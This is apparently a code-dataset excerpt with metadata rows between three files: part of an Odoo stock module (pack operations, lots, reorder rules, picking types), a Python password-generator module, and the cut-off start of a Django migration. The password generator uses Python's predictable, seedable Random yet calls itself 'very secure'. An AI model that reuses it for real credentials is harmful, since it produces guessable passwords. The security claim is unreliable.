res[ops.id] = float_round(qty, precision_rounding=ops.product_id.uom_id.rounding)
return res
def product_id_change(self, cr, uid, ids, product_id, product_uom_id, product_qty, context=None):
res = self.on_change_tests(cr, uid, ids, product_id, product_uom_id, product_qty, context=context)
uom_obj = self.pool['product.uom']
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
if (product_id and not product_uom_id) or uom_obj.browse(cr, uid, product_uom_id, context=context).category_id.id != product.uom_id.category_id.id:
res['value']['product_uom_id'] = product.uom_id.id
if product:
res['value']['lots_visible'] = (product.tracking != 'none')
res['domain'] = {'product_uom_id': [('category_id','=',product.uom_id.category_id.id)]}
else:
res['domain'] = {'product_uom_id': []}
return res
def on_change_tests(self, cr, uid, ids, product_id, product_uom_id, product_qty, context=None):
res = {'value': {}}
uom_obj = self.pool.get('product.uom')
if product_id:
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
product_uom_id = product_uom_id or product.uom_id.id
selected_uom = uom_obj.browse(cr, uid, product_uom_id, context=context)
if selected_uom.category_id.id != product.uom_id.category_id.id:
res['warning'] = {
'title': _('Warning: wrong UoM!'),
'message': _('The selected UoM for product %s is not compatible with the UoM set on the product form. \nPlease choose a UoM within the same UoM category.') % (product.name)
}
if product_qty and 'warning' not in res:
rounded_qty = uom_obj._compute_qty(cr, uid, product_uom_id, product_qty, product_uom_id, round=True)
if rounded_qty != product_qty:
res['warning'] = {
'title': _('Warning: wrong quantity!'),
'message': _('The chosen quantity for product %s is not compatible with the UoM rounding. It will be automatically converted at confirmation') % (product.name)
}
return res
def _compute_location_description(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for op in self.browse(cr, uid, ids, context=context):
from_name = op.location_id.name
to_name = op.location_dest_id.name
if op.package_id and op.product_id:
from_name += " : " + op.package_id.name
if op.result_package_id:
to_name += " : " + op.result_package_id.name
res[op.id] = {'from_loc': from_name,
'to_loc': to_name}
return res
def _get_bool(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for pack in self.browse(cr, uid, ids, context=context):
res[pack.id] = (pack.qty_done > 0.0)
return res
def _set_processed_qty(self, cr, uid, id, field_name, field_value, arg, context=None):
op = self.browse(cr, uid, id, context=context)
if not op.product_id:
if field_value and op.qty_done == 0:
self.write(cr, uid, [id], {'qty_done': 1.0}, context=context)
if not field_value and op.qty_done != 0:
self.write(cr, uid, [id], {'qty_done': 0.0}, context=context)
return True
def _compute_lots_visible(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for pack in self.browse(cr, uid, ids, context=context):
if pack.pack_lot_ids:
res[pack.id] = True
continue
pick = pack.picking_id
product_requires = (pack.product_id.tracking != 'none')
if pick.picking_type_id:
res[pack.id] = (pick.picking_type_id.use_existing_lots or pick.picking_type_id.use_create_lots) and product_requires
else:
res[pack.id] = product_requires
return res
def _get_default_from_loc(self, cr, uid, context=None):
default_loc = context.get('default_location_id')
if default_loc:
return self.pool['stock.location'].browse(cr, uid, default_loc, context=context).name
def _get_default_to_loc(self, cr, uid, context=None):
default_loc = context.get('default_location_dest_id')
if default_loc:
return self.pool['stock.location'].browse(cr, uid, default_loc, context=context).name
_columns = {
'picking_id': fields.many2one('stock.picking', 'Stock Picking', help='The stock operation where the packing has been made', required=True),
'product_id': fields.many2one('product.product', 'Product', ondelete="CASCADE"), # 1
'product_uom_id': fields.many2one('product.uom', 'Unit of Measure'),
'product_qty': fields.float('To Do', digits_compute=dp.get_precision('Product Unit of Measure'), required=True),
'qty_done': fields.float('Done', digits_compute=dp.get_precision('Product Unit of Measure')),
'processed_boolean': fields.function(_get_bool, fnct_inv=_set_processed_qty, type='boolean', string='Done'),
'package_id': fields.many2one('stock.quant.package', 'Source Package'), # 2
'pack_lot_ids': fields.one2many('stock.pack.operation.lot', 'operation_id', 'Lots Used'),
'result_package_id': fields.many2one('stock.quant.package', 'Destination Package', help="If set, the operations are packed into this package", required=False, ondelete='cascade'),
'date': fields.datetime('Date', required=True),
'owner_id': fields.many2one('res.partner', 'Owner', help="Owner of the quants"),
'linked_move_operation_ids': fields.one2many('stock.move.operation.link', 'operation_id', string='Linked Moves', readonly=True, help='Moves impacted by this operation for the computation of the remaining quantities'),
'remaining_qty': fields.function(_get_remaining_qty, type='float', digits = 0, string="Remaining Qty", help="Remaining quantity in default UoM according to moves matched with this operation. "),
'location_id': fields.many2one('stock.location', 'Source Location', required=True),
'location_dest_id': fields.many2one('stock.location', 'Destination Location', required=True),
'picking_source_location_id': fields.related('picking_id', 'location_id', type='many2one', relation='stock.location'),
'picking_destination_location_id': fields.related('picking_id', 'location_dest_id', type='many2one', relation='stock.location'),
'from_loc': fields.function(_compute_location_description, type='char', string='From', multi='loc'),
'to_loc': fields.function(_compute_location_description, type='char', string='To', multi='loc'),
'fresh_record': fields.boolean('Newly created pack operation'),
'lots_visible': fields.function(_compute_lots_visible, type='boolean'),
'state': fields.related('picking_id', 'state', type='selection', selection=[
('draft', 'Draft'),
('cancel', 'Cancelled'),
('waiting', 'Waiting Another Operation'),
('confirmed', 'Waiting Availability'),
('partially_available', 'Partially Available'),
('assigned', 'Available'),
('done', 'Done'),
]),
}
_defaults = {
'date': fields.date.context_today,
'qty_done': 0.0,
'product_qty': 0.0,
'processed_boolean': lambda *a: False,
'fresh_record': True,
'from_loc': _get_default_from_loc,
'to_loc': _get_default_to_loc,
}
def split_quantities(self, cr, uid, ids, context=None):
for pack in self.browse(cr, uid, ids, context=context):
if pack.product_qty - pack.qty_done > 0.0 and pack.qty_done < pack.product_qty:
pack2 = self.copy(cr, uid, pack.id, default={'qty_done': 0.0, 'product_qty': pack.product_qty - pack.qty_done}, context=context)
self.write(cr, uid, [pack.id], {'product_qty': pack.qty_done}, context=context)
self._copy_remaining_pack_lot_ids(cr, uid, pack.id, pack2, context=context)
else:
raise UserError(_('The quantity to split should be smaller than the quantity To Do. '))
return True
def write(self, cr, uid, ids, vals, context=None):
vals['fresh_record'] = False
context = context or {}
res = super(stock_pack_operation, self).write(cr, uid, ids, vals, context=context)
return res
def unlink(self, cr, uid, ids, context=None):
if any([x.state in ('done', 'cancel') for x in self.browse(cr, uid, ids, context=context)]):
raise UserError(_('You can not delete pack operations of a done picking'))
return super(stock_pack_operation, self).unlink(cr, uid, ids, context=context)
def check_tracking(self, cr, uid, ids, context=None):
""" Checks if serial number is assigned to stock move or not and raise an error if it had to.
"""
operations = self.browse(cr, uid, ids, context=context)
for ops in operations:
if ops.picking_id and (ops.picking_id.picking_type_id.use_existing_lots or ops.picking_id.picking_type_id.use_create_lots) and \
ops.product_id and ops.product_id.tracking != 'none' and ops.qty_done > 0.0:
if not ops.pack_lot_ids:
raise UserError(_('You need to provide a Lot/Serial Number for product %s') % ops.product_id.name)
if ops.product_id.tracking == 'serial':
for opslot in ops.pack_lot_ids:
if opslot.qty not in (1.0, 0.0):
raise UserError(_('You should provide a different serial number for each piece'))
def save(self, cr, uid, ids, context=None):
for pack in self.browse(cr, uid, ids, context=context):
if pack.product_id.tracking != 'none':
qty_done = sum([x.qty for x in pack.pack_lot_ids])
self.pool['stock.pack.operation'].write(cr, uid, [pack.id], {'qty_done': qty_done}, context=context)
return {'type': 'ir.actions.act_window_close'}
def split_lot(self, cr, uid, ids, context=None):
context = context or {}
ctx = context.copy()
assert len(ids) > 0
data_obj = self.pool['ir.model.data']
pack = self.browse(cr, uid, ids[0], context=context)
picking_type = pack.picking_id.picking_type_id
serial = (pack.product_id.tracking == 'serial')
view = data_obj.xmlid_to_res_id(cr, uid, 'stock.view_pack_operation_lot_form')
# If it's a returned stock move, we do not want to create a lot
returned_move = pack.linked_move_operation_ids.mapped('move_id').mapped('origin_returned_move_id')
only_create = picking_type.use_create_lots and not picking_type.use_existing_lots and not returned_move
show_reserved = any([x for x in pack.pack_lot_ids if x.qty_todo > 0.0])
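#these context keys drive the lot details form: serial tracking, whether only new lots may be created (no existing-lot selection, not a return) and whether reserved quantities are displayed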
ctx.update({'serial': serial,
'only_create': only_create,
'create_lots': picking_type.use_create_lots,
'state_done': pack.picking_id.state == 'done',
'show_reserved': show_reserved})
return {
'name': _('Lot Details'),
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'stock.pack.operation',
'views': [(view, 'form')],
'view_id': view,
'target': 'new',
'res_id': pack.id,
'context': ctx,
}
def show_details(self, cr, uid, ids, context=None):
data_obj = self.pool['ir.model.data']
view = data_obj.xmlid_to_res_id(cr, uid, 'stock.view_pack_operation_details_form_save')
pack = self.browse(cr, uid, ids[0], context=context)
return {
'name': _('Operation Details'),
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'stock.pack.operation',
'views': [(view, 'form')],
'view_id': view,
'target': 'new',
'res_id': pack.id,
'context': context,
}
def _copy_remaining_pack_lot_ids(self, cr, uid, id, new_operation_id, context=None):
stock_pack_operation_lot_obj = self.pool["stock.pack.operation.lot"]
old_operation = self.browse(cr, uid, id, context=context)
for pack_lot_id in old_operation.pack_lot_ids:
new_qty_todo = pack_lot_id.qty_todo - pack_lot_id.qty
if float_compare(new_qty_todo, 0, precision_rounding=old_operation.product_uom_id.rounding) > 0:
stock_pack_operation_lot_obj.copy(cr, uid, pack_lot_id.id, {'operation_id': new_operation_id,
'qty_todo': new_qty_todo,
'qty': 0}, context=context)
class stock_pack_operation_lot(osv.osv):
_name = "stock.pack.operation.lot"
_description = "Specifies lot/serial number for pack operations that need it"
def _get_plus(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for packlot in self.browse(cr, uid, ids, context=context):
if packlot.operation_id.product_id.tracking == 'serial':
res[packlot.id] = (packlot.qty == 0.0)
else:
res[packlot.id] = (packlot.qty_todo == 0.0) or (packlot.qty < packlot.qty_todo)
return res
_columns = {
'operation_id': fields.many2one('stock.pack.operation'),
'qty': fields.float('Done'),
'lot_id': fields.many2one('stock.production.lot', 'Lot/Serial Number'),
'lot_name': fields.char('Lot Name'),
'qty_todo': fields.float('To Do'),
'plus_visible': fields.function(_get_plus, type='boolean'),
}
_defaults = {
'qty': lambda self, cr, uid, context: 1.0,
'qty_todo': lambda self, cr, uid, context: 0.0,
'plus_visible': True,
}
def _check_lot(self, cr, uid, ids, context=None):
for packlot in self.browse(cr, uid, ids, context=context):
if not packlot.lot_name and not packlot.lot_id:
return False
return True
_constraints = [
(_check_lot,
'Lot is required',
['lot_id', 'lot_name']),
]
_sql_constraints = [
('qty', 'CHECK(qty >= 0.0)','Quantity must be greater than or equal to 0.0!'),
('uniq_lot_id', 'unique(operation_id, lot_id)', 'You have already mentioned this lot in another line'),
('uniq_lot_name', 'unique(operation_id, lot_name)', 'You have already mentioned this lot name in another line')]
def do_plus(self, cr, uid, ids, context=None):
pack_obj = self.pool['stock.pack.operation']
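#increase the lot line quantity by one, keep the parent operation's done quantity in sync with the sum of its lot lines, then reopen the lot details view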
for packlot in self.browse(cr, uid, ids, context=context):
self.write(cr, uid, [packlot.id], {'qty': packlot.qty + 1}, context=context)
pack = self.browse(cr, uid, ids[0], context=context).operation_id
qty_done = sum([x.qty for x in pack.pack_lot_ids])
pack_obj.write(cr, uid, [pack.id], {'qty_done': qty_done}, context=context)
return pack_obj.split_lot(cr, uid, [pack.id], context=context)
def do_minus(self, cr, uid, ids, context=None):
pack_obj = self.pool['stock.pack.operation']
for packlot in self.browse(cr, uid, ids, context=context):
self.write(cr, uid, [packlot.id], {'qty': packlot.qty - 1}, context=context)
pack = self.browse(cr, uid, ids[0], context=context).operation_id
qty_done = sum([x.qty for x in pack.pack_lot_ids])
pack_obj.write(cr, uid, [pack.id], {'qty_done': qty_done}, context=context)
return pack_obj.split_lot(cr, uid, [pack.id], context=context)
class stock_move_operation_link(osv.osv):
"""
Table making the link between stock.moves and stock.pack.operations to compute the remaining quantities on each of these objects
"""
_name = "stock.move.operation.link"
_description = "Link between stock moves and pack operations"
_columns = {
'qty': fields.float('Quantity', help="Quantity of products to consider when talking about the contribution of this pack operation towards the remaining quantity of the move (and inverse). Given in the product main uom."),
'operation_id': fields.many2one('stock.pack.operation', 'Operation', required=True, ondelete="cascade"),
'move_id': fields.many2one('stock.move', 'Move', required=True, ondelete="cascade"),
'reserved_quant_id': fields.many2one('stock.quant', 'Reserved Quant', help="Technical field containing the quant that created this link between an operation and a stock move. Used at the stock_move_obj.action_done() time to avoid seeking a matching quant again"),
}
class stock_warehouse_orderpoint(osv.osv):
"""
Defines Minimum stock rules.
"""
_name = "stock.warehouse.orderpoint"
_description = "Minimum Inventory Rule"
def subtract_procurements_from_orderpoints(self, cr, uid, orderpoint_ids, context=None):
'''This function returns the quantity of product that needs to be deducted from the orderpoint computed quantity because a procurement has already been created to fulfill it.
'''
cr.execute("""select op.id, p.id, p.product_uom, p.product_qty, pt.uom_id, sm.product_qty from procurement_order as p left join stock_move as sm ON sm.procurement_id = p.id,
stock_warehouse_orderpoint op, product_product pp, product_template pt
WHERE p.orderpoint_id = op.id AND p.state not in ('done', 'cancel') AND (sm.state IS NULL OR sm.state not in ('draft'))
AND pp.id = p.product_id AND pp.product_tmpl_id = pt.id
AND op.id IN %s
ORDER BY op.id, p.id
""", (tuple(orderpoint_ids),))
results = cr.fetchall()
current_proc = False
current_op = False
uom_obj = self.pool.get("product.uom")
op_qty = 0
res = dict.fromkeys(orderpoint_ids, 0.0)
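#rows are ordered by orderpoint then procurement: add each procurement quantity once (converted to the product UoM) and subtract the quantities already covered by its stock moves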
for move_result in results:
op = move_result[0]
if current_op != op:
if current_op:
res[current_op] = op_qty
current_op = op
op_qty = 0
proc = move_result[1]
if proc != current_proc:
op_qty += uom_obj._compute_qty(cr, uid, move_result[2], move_result[3], move_result[4], round=False)
current_proc = proc
if move_result[5]: #if a move is already associated, subtract its quantity
op_qty -= move_result[5]
if current_op:
res[current_op] = op_qty
return res
def _check_product_uom(self, cr, uid, ids, context=None):
'''
Check if the UoM has the same category as the product standard UoM
'''
if not context:
context = {}
for rule in self.browse(cr, uid, ids, context=context):
if rule.product_id.uom_id.category_id.id != rule.product_uom.category_id.id:
return False
return True
_columns = {
'name': fields.char('Name', required=True, copy=False),
'active': fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the orderpoint without removing it."),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse', required=True, ondelete="cascade"),
'location_id': fields.many2one('stock.location', 'Location', required=True, ondelete="cascade"),
'product_id': fields.many2one('product.product', 'Product', required=True, ondelete='cascade', domain=[('type', '=', 'product')]),
'product_uom': fields.related('product_id', 'uom_id', type='many2one', relation='product.uom', string='Product Unit of Measure', readonly=True, required=True),
'product_min_qty': fields.float('Minimum Quantity', required=True,
digits_compute=dp.get_precision('Product Unit of Measure'),
help="When the virtual stock goes below the Min Quantity specified for this field, Odoo generates "\
"a procurement to bring the forecasted quantity to the Max Quantity."),
'product_max_qty': fields.float('Maximum Quantity', required=True,
digits_compute=dp.get_precision('Product Unit of Measure'),
help="When the virtual stock goes below the Min Quantity, Odoo generates "\
"a procurement to bring the forecasted quantity to the Quantity specified as Max Quantity."),
'qty_multiple': fields.float('Qty Multiple', required=True,
digits_compute=dp.get_precision('Product Unit of Measure'),
help="The procurement quantity will be rounded up to this multiple. If it is 0, the exact quantity will be used. "),
'procurement_ids': fields.one2many('procurement.order', 'orderpoint_id', 'Created Procurements'),
'group_id': fields.many2one('procurement.group', 'Procurement Group', help="Moves created through this orderpoint will be put in this procurement group. If none is given, the moves generated by procurement rules will be grouped into one big picking.", copy=False),
'company_id': fields.many2one('res.company', 'Company', required=True),
'lead_days': fields.integer('Lead Time', help="Number of days after the orderpoint is triggered to receive the products or to order to the vendor"),
'lead_type': fields.selection([
('net', 'Day(s) to get the products'),
('supplier', 'Day(s) to purchase')
], 'Lead Type', required=True)
}
_defaults = {
'active': lambda *a: 1,
'lead_days': lambda *a: 1,
'lead_type': lambda *a: 'supplier',
'qty_multiple': lambda *a: 1,
'name': lambda self, cr, uid, context: self.pool.get('ir.sequence').next_by_code(cr, uid, 'stock.orderpoint') or '',
'product_uom': lambda self, cr, uid, context: context.get('product_uom', False),
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.warehouse.orderpoint', context=context)
}
_sql_constraints = [
('qty_multiple_check', 'CHECK( qty_multiple >= 0 )', 'Qty Multiple must be greater than or equal to zero.'),
]
_constraints = [
(_check_product_uom, 'You have to select a product unit of measure in the same category as the default unit of measure of the product', ['product_id', 'product_uom']),
]
def default_get(self, cr, uid, fields, context=None):
warehouse_obj = self.pool.get('stock.warehouse')
res = super(stock_warehouse_orderpoint, self).default_get(cr, uid, fields, context)
# default 'warehouse_id' and 'location_id'
if 'warehouse_id' not in res:
warehouse_ids = res.get('company_id') and warehouse_obj.search(cr, uid, [('company_id', '=', res['company_id'])], limit=1, context=context) or []
res['warehouse_id'] = warehouse_ids and warehouse_ids[0] or False
if 'location_id' not in res:
res['location_id'] = res.get('warehouse_id') and warehouse_obj.browse(cr, uid, res['warehouse_id'], context).lot_stock_id.id or False
return res
def onchange_warehouse_id(self, cr, uid, ids, warehouse_id, context=None):
""" Finds location id for changed warehouse.
@param warehouse_id: Changed id of warehouse.
@return: Dictionary of values.
"""
if warehouse_id:
w = self.pool.get('stock.warehouse').browse(cr, uid, warehouse_id, context=context)
v = {'location_id': w.lot_stock_id.id}
return {'value': v}
return {}
def onchange_product_id(self, cr, uid, ids, product_id, context=None):
""" Finds UoM for changed product.
@param product_id: Changed id of product.
@return: Dictionary of values.
"""
if product_id:
prod = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
d = {'product_uom': [('category_id', '=', prod.uom_id.category_id.id)]}
v = {'product_uom': prod.uom_id.id}
return {'value': v, 'domain': d}
return {'domain': {'product_uom': []}}
class stock_picking_type(osv.osv):
_name = "stock.picking.type"
_description = "The picking type determines the picking view"
_order = 'sequence'
def open_barcode_interface(self, cr, uid, ids, context=None):
final_url = "/stock/barcode/#action=stock.ui&picking_type_id=" + str(ids[0]) if len(ids) else '0'
return {'type': 'ir.actions.act_url', 'url': final_url, 'target': 'self'}
def _get_tristate_values(self, cr, uid, ids, field_name, arg, context=None):
picking_obj = self.pool.get('stock.picking')
res = {}
for picking_type_id in ids:
#get last 10 pickings of this type
picking_ids = picking_obj.search(cr, uid, [('picking_type_id', '=', picking_type_id), ('state', '=', 'done')], order='date_done desc', limit=10, context=context)
tristates = []
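#encode each picking as -1 (late), 0 (done with a backorder) or 1 (on time); insert(0, ...) reverses the order so the oldest picking comes first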
for picking in picking_obj.browse(cr, uid, picking_ids, context=context):
if picking.date_done > picking.date:
tristates.insert(0, {'tooltip': (picking.name or '') + ": " + _('Late'), 'value': -1})
elif picking.backorder_id:
tristates.insert(0, {'tooltip': (picking.name or '') + ": " + _('Backorder exists'), 'value': 0})
else:
tristates.insert(0, {'tooltip': (picking.name or '') + ": " + _('OK'), 'value': 1})
res[picking_type_id] = json.dumps(tristates)
return res
def _get_picking_count(self, cr, uid, ids, field_names, arg, context=None):
obj = self.pool.get('stock.picking')
domains = {
'count_picking_draft': [('state', '=', 'draft')],
'count_picking_waiting': [('state', 'in', ('confirmed', 'waiting'))],
'count_picking_ready': [('state', 'in', ('assigned', 'partially_available'))],
'count_picking': [('state', 'in', ('assigned', 'waiting', 'confirmed', 'partially_available'))],
'count_picking_late': [('min_date', '<', time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)), ('state', 'in', ('assigned', 'waiting', 'confirmed', 'partially_available'))],
'count_picking_backorders': [('backorder_id', '!=', False), ('state', 'in', ('confirmed', 'assigned', 'waiting', 'partially_available'))],
}
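#one read_group per indicator, restricted to open pickings of the requested picking types; counts are then dispatched per picking type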
result = {}
for field in domains:
data = obj.read_group(cr, uid, domains[field] +
[('state', 'not in', ('done', 'cancel')), ('picking_type_id', 'in', ids)],
['picking_type_id'], ['picking_type_id'], context=context)
count = dict(map(lambda x: (x['picking_type_id'] and x['picking_type_id'][0], x['picking_type_id_count']), data))
for tid in ids:
result.setdefault(tid, {})[field] = count.get(tid, 0)
for tid in ids:
if result[tid]['count_picking']:
result[tid]['rate_picking_late'] = result[tid]['count_picking_late'] * 100 / result[tid]['count_picking']
result[tid]['rate_picking_backorders'] = result[tid]['count_picking_backorders'] * 100 / result[tid]['count_picking']
else:
result[tid]['rate_picking_late'] = 0
result[tid]['rate_picking_backorders'] = 0
return result
def _get_action(self, cr, uid, ids, action, context=None):
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
result = mod_obj.xmlid_to_res_id(cr, uid, action, raise_if_not_found=True)
result = act_obj.read(cr, uid, [result], context=context)[0]
if ids:
picking_type = self.browse(cr, uid, ids[0], context=context)
result['display_name'] = picking_type.display_name
return result
def get_action_picking_tree_late(self, cr, uid, ids, context=None):
return self._get_action(cr, uid, ids, 'stock.action_picking_tree_late', context=context)
def get_action_picking_tree_backorder(self, cr, uid, ids, context=None):
return self._get_action(cr, uid, ids, 'stock.action_picking_tree_backorder', context=context)
def get_action_picking_tree_waiting(self, cr, uid, ids, context=None):
return self._get_action(cr, uid, ids, 'stock.action_picking_tree_waiting', context=context)
def get_action_picking_tree_ready(self, cr, uid, ids, context=None):
return self._get_action(cr, uid, ids, 'stock.action_picking_tree_ready', context=context)
def get_stock_picking_action_picking_type(self, cr, uid, ids, context=None):
return self._get_action(cr, uid, ids, 'stock.stock_picking_action_picking_type', context=context)
def onchange_picking_code(self, cr, uid, ids, picking_code=False):
if not picking_code:
return False
obj_data = self.pool.get('ir.model.data')
stock_loc = obj_data.xmlid_to_res_id(cr, uid, 'stock.stock_location_stock')
result = {
'default_location_src_id': stock_loc,
'default_location_dest_id': stock_loc,
}
if picking_code == 'incoming':
result['default_location_src_id'] = obj_data.xmlid_to_res_id(cr, uid, 'stock.stock_location_suppliers')
elif picking_code == 'outgoing':
result['default_location_dest_id'] = obj_data.xmlid_to_res_id(cr, uid, 'stock.stock_location_customers')
return {'value': result}
def _get_name(self, cr, uid, ids, field_names, arg, context=None):
return dict(self.name_get(cr, uid, ids, context=context))
def name_get(self, cr, uid, ids, context=None):
"""Overides orm name_get method to display 'Warehouse_name: PickingType_name' """
if context is None:
context = {}
if not isinstance(ids, list):
ids = [ids]
res = []
if not ids:
return res
for record in self.browse(cr, uid, ids, context=context):
name = record.name
if record.warehouse_id:
name = record.warehouse_id.name + ': ' +name
res.append((record.id, name))
return res
@api.model
def name_search(self, name, args=None, operator='ilike', limit=100):
args = args or []
domain = []
if name:
domain = ['|', ('name', operator, name), ('warehouse_id.name', operator, name)]
picks = self.search(domain + args, limit=limit)
return picks.name_get()
def _default_warehouse(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context)
res = self.pool.get('stock.warehouse').search(cr, uid, [('company_id', '=', user.company_id.id)], limit=1, context=context)
return res and res[0] or False
_columns = {
'name': fields.char('Picking Type Name', translate=True, required=True),
'complete_name': fields.function(_get_name, type='char', string='Name'),
'color': fields.integer('Color'),
'sequence': fields.integer('Sequence', help="Used to order the 'All Operations' kanban view"),
'sequence_id': fields.many2one('ir.sequence', 'Reference Sequence', required=True),
'default_location_src_id': fields.many2one('stock.location', 'Default Source Location', help="This is the default source location when you create a picking manually with this picking type. It is possible however to change it or that the routes put another location. If it is empty, it will check for the supplier location on the partner. "),
'default_location_dest_id': fields.many2one('stock.location', 'Default Destination Location', help="This is the default destination location when you create a picking manually with this picking type. It is possible however to change it or that the routes put another location. If it is empty, it will check for the customer location on the partner. "),
'code': fields.selection([('incoming', 'Suppliers'), ('outgoing', 'Customers'), ('internal', 'Internal')], 'Type of Operation', required=True),
'return_picking_type_id': fields.many2one('stock.picking.type', 'Picking Type for Returns'),
'show_entire_packs': fields.boolean('Allow moving packs', help="If checked, this shows the packs to be moved as a whole in the Operations tab all the time, even if there was no entire pack reserved."),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse', ondelete='cascade'),
'active': fields.boolean('Active'),
'use_create_lots': fields.boolean('Create New Lots', help="If this is checked only, it will suppose you want to create new Serial Numbers / Lots, so you can provide them in a text field. "),
'use_existing_lots': fields.boolean('Use Existing Lots', help="If this is checked, you will be able to choose the Serial Number / Lots. You can also decide to not put lots in this picking type. This means it will create stock with no lot or not put a restriction on the lot taken. "),
# Statistics for the kanban view
'last_done_picking': fields.function(_get_tristate_values,
type='char',
string='Last 10 Done Pickings'),
'count_picking_draft': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
'count_picking_ready': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
'count_picking': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
'count_picking_waiting': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
'count_picking_late': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
'count_picking_backorders': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
'rate_picking_late': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
'rate_picking_backorders': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
# Barcode nomenclature
'barcode_nomenclature_id': fields.many2one('barcode.nomenclature','Barcode Nomenclature', help='A barcode nomenclature'),
}
_defaults = {
'warehouse_id': _default_warehouse,
'active': True,
'use_existing_lots': True,
'use_create_lots': True,
}
class barcode_rule(models.Model):
_inherit = 'barcode.rule'
def _get_type_selection(self):
types = sets.Set(super(barcode_rule,self)._get_type_selection())
types.update([
('weight', _('Weighted Product')),
('location', _('Location')),
('lot', _('Lot')),
('package', _('Package'))
])
return list(types)
class StockPackOperation(models.Model):
_inherit = 'stock.pack.operation'
@api.onchange('pack_lot_ids')
def _onchange_packlots(self):
self.qty_done = sum([x.qty for x in self.pack_lot_ids])
|
agpl-3.0
| -7,653,917,894,173,250,000
| 58.807486
| 420
| 0.595567
| false
| 3.864032
| false
| false
| false
|
TheDSCPL/SSRE_2017-2018_group8
|
Projeto/Python/cryptopy/crypto/passwords/passwordfactory.py
|
1
|
3751
|
# -*- coding: utf-8 -*-
""" crypto.passwords.passwordfactory
Python classes to create and recover passwords. Currently contains
simple password generation. <need to merge the dictionary based pws>
Copyright © (c) 2002 by Paul A. Lambert
Read LICENSE.txt for license information.
August 14, 2002
"""
from random import Random
from sha import sha # the SHA1 algorithm for cryptographic hashing
from math import log, ceil
#from binascii_plus import b2a_p
class PasswordFactory:
""" Make passwords using pseudo random seeds.
Also used to recover passwords by using same pwSeed.
        If the seed is not saved, the password cannot be recovered!
"""
def __init__(self, pwFactorySeed, minSize=10, maxSize=10 ):
""" An abstract class to create passwords """
self._factorySeed = pwFactorySeed
self.minSize = minSize
self.maxSize = maxSize
self.rand = Random( self._factorySeed )
def getPassword(self, pwSeed):
        raise NotImplementedError("getPassword MUST be overloaded")
def __call__(self, pwSeed):
""" Create a new password as a 'call' """
return self.getPassword(pwSeed)
def entropy(self):
""" Calculate the security of the password generation as a power of 2 """
total = 0
for pwSize in range(self.minSize, self.maxSize+1):
total = total + self.passwordsForSize(pwSize)
return powof2( total )
def powof2(x):
""" Convert x to a power of 2 """
return log(x)/log(2)
class PasswordFactorySimple(PasswordFactory):
""" This class implements a very secure but simple selection of numbers and letters.
        Some characters have been removed to prevent confusion between similar shapes.
The removed characters are: (O,0,o), (l,1,I) , (u,v),(U,V)
"""
def __init__(self, pwFactorySeed, minSize=10, maxSize=10 ):
""" Initialize password generation """
PasswordFactory.__init__(self, pwFactorySeed, minSize, maxSize )
self.lettersReduced = 'abcdefghijkmnpqrstwxyzABCDEFGHJKLMNPQRSTWXYZ'
self.digitsReduced = '23456789'
self.specialCharacters = '#%*+$'
def getPassword(self, pwSeed):
""" Create a new password from pwSeed. """
self.rand.seed( pwSeed + 'getPassword' + self._factorySeed ) # reset prf sequence
self.passwordSize = self.rand.randrange(self.minSize, self.maxSize+1)
password = ''
for i in range(self.passwordSize):
password = password + self.rand.choice(self.lettersReduced+self.digitsReduced)
return password
def passwordsForSize(self,pwSize):
return (len(self.lettersReduced)+len(self.digitsReduced))**pwSize
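    # Worked example (illustrative, not in the original source): with
    # minSize == maxSize == 10 the alphabet holds 44 letters + 8 digits = 52
    # symbols, so entropy() ~= log2(52**10) ~= 57 bits.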
consonants_01 = 'bcdfghjklmnpqrstvwxz'
vowels_01 = 'aeiouy'
class PasswordFactoryReadable_01(PasswordFactory):
    """ Readable passwords created by alternating consonant/vowel/consonant ... etc.
"""
def getPassword(self, pwSeed):
""" Create a new password. Also used to recover passwords by using same pwSeed """
#self.rand.seed( 'getPassword'+self.__factorySeed+pwSeed ) # reset prf sequence
self.passwordSize = self.rand.randrange(self.minSize, self.maxSize+1)
password = ''
for i in range(self.passwordSize):
if i == 0 :
password = password + self.rand.choice(consonants_01)
else:
if password[-1] in consonants_01 :
password = password + self.rand.choice(vowels_01)
else:
password = password + self.rand.choice(consonants_01)
return password
def passwordsForSize(self,pwSize):
        return (len(vowels_01)**(pwSize/2))*(len(consonants_01)**ceil(pwSize/2.0))  # float division so the consonant count rounds up for odd sizes
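# Minimal usage sketch (illustrative only; the seeds below are made up):
#   factory = PasswordFactorySimple('my factory seed', minSize=8, maxSize=12)
#   pw1 = factory('backup-server')   # getPassword() reseeds from pwSeed + factory seed,
#   pw2 = factory('backup-server')   # so the same pwSeed reproduces the same password
#   assert pw1 == pw2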
|
mit
| -202,067,140,215,519,550
| 38.484211
| 94
| 0.647561
| false
| 3.935992
| false
| false
| false
|
mitodl/bootcamp-ecommerce
|
cms/migrations/0025_add_resource_pages_settings.py
|
1
|
2756
|
# Generated by Django 2.2.13 on 2020-06-29 18:27
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("wagtailcore", "0045_assign_unlock_grouppagepermission"),
("cms", "0024_lettertemplatepage"),
]
operations = [
migrations.CreateModel(
